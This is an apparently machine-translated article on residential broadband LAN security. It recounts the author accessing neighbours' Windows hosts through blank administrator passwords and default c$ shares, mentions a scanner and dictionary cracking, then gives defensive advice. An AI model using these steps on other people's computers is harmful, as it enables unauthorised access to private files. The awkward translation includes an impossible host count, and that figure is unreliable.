Sniffer attack and defense instances in the broadband Internet access environment

There seem to be many articles about broadband Internet security, but they often refer to problems such as Trojans and Internet Explorer vulnerabilities. As a result, there is a more dangerous problem that does not seem to be noticed by users, not even valued by the firewall, but once infiltrated, all your drives and files can be shared freely, and the implementation is so simple. What is the danger? Let me hear about it.

Thoughts

Recently, I am decorating my new home. In the past two days, considering the network structure of the LAN in my new home, I used wire connection early and will definitely move over, so now there are two solutions that I can consider:

1. cable modem-HUB-hosts;
2. cable modem-server (soft route)-HUB-hosts

We can see that the first solution is better. Obviously, the network structure is simple. At least one network card can be saved, and no server is required to be open all day. This is also the recommendation in the Wired documentation. However, I suddenly realized the security issues that I had not paid much attention to for a long time when I thought about the sharing between the hosts in the first solution.

As we all know, the so-called residential broadband is a solution for LAN + Internet egress. users in the residential area are connected to a LAN and then connected to the Internet through an egress, the security of this solution is relatively poor, mainly because it is connected to a LAN. If you do not pay attention, others may share your resources. The Wired connection is more concealed. It is not a common structure of star Ethernet + egress physically, and the DHCP server assigns standard class C addresses to users, it seems that we are directly facing the impact of the wide area network. As we do not know, his physical bus structure connects almost all wired users to a LAN, and we are also facing a serious security problem of the domestic network, in addition, the domestic network has a larger scope, so it is more likely to be intruded (strictly speaking, it cannot be called intrusion, but shared.

Lab

To verify my point of view, I did the following experiments:

The IP address assigned to my host is 211.167.123.8, which is a standard class c address. Therefore, the subnet mask is 24 bits, this means that theoretically there are 252 hosts (remove the gateway and myself) and I are in the same network segment. Considering the actual usage of Wired connections, 252 hosts are not estimated to be available, however, there should be dozens of hosts at the same time. I should say that I can access these hosts.

So I ping the host from 211.167.123.2 to 211.167.123.15, indicating that the host is in the active connection. I will immediately open IE and enter \ 211.167.123.15 in the address bar, the system prompts me to enter the user name and password. The user name is administrator and the password is blank. What resources can't be shared except for printers? It doesn't matter. I am already an administrator. Are you afraid you can't find the resource? I will enter \ 211.167.123.15 \ c $ again. The root directory of drive c will not be displayed. This is the default share of windows2000, which is for management and cannot be deleted. Next, d $, e $, and enter your own information.
In the course of the experiment, FluxayIV (streamer) was used in combination, and a network segment was completed in 3 or 5 minutes. It was found that there were 3 million hosts in the active connection, the administrator account and password of five or six hosts are empty. Isn't it a prime choice? Even those with passwords won't be too complicated on their computers. It's not very difficult to include a dictionary if you want to disassemble it. What's more, it may be that a company's host directly shares all the resources without any password. It seems that it was used as a file server.

Conclusion

Now everyone knows which of the above two solutions is better?

Because the standard class C address is assigned through the wire, it is impossible to extend the subnet mask to reduce the number of hosts in each network segment. Therefore, the security of the domestic network is always an enemy of our users. In addition, the IP address allocated by the DHCP server is valid for about a week. You will be assigned a new IP address, which means that you have entered a new network segment, another 252 new neighbors are waiting for you. Are you terrible? The most terrible thing is that a host in the same network segment as you is considered as a LAN host by your firewall. Generally, it is not defended against such hosts in the preset firewall.

Preventive Measures

First, it is also the minimum, that is, to set a password for your administrator Account (not too simple), because this account cannot be deleted, and you cannot leave the password blank even if you don't need it. During the experiment, I found that many users may usually use another account, but the password is set, but the administrator password is empty. Isn't it a waste of time?

Some administrator accounts and passwords are set, but several other accounts with blank passwords are opened, which is also dangerous. Remember, you must set passwords for all available accounts, manage these accounts regularly, and disable accounts that are not used for a long time. It is best to change the password frequently for administrator accounts.

Installing one or two firewalls is a good method, but remember to set the firewall, because the default LAN host is not strictly protected, as you can see, we should know that the most important thing we need to guard against is these "Lan" hosts. At the same time, the firewall itself may also have vulnerabilities, so I am using Skynet + Norton, so cross-defense is quite reassuring. For more information about how to configure the firewall, see related articles.

We also want to remind you that, after such protection, if your network structure adopts the first solution, then you cannot share several of your hosts, because these hosts and other hosts in the CIDR block are on an equal footing. Therefore, if you want to build your own network and consider security, we suggest you adopt the second solution. If you can use a hardware router instead of a soft route, it will be better.

The purpose of this article is to serve as a reference. If you think of convenient, safe, and efficient preventive measures, please contact me.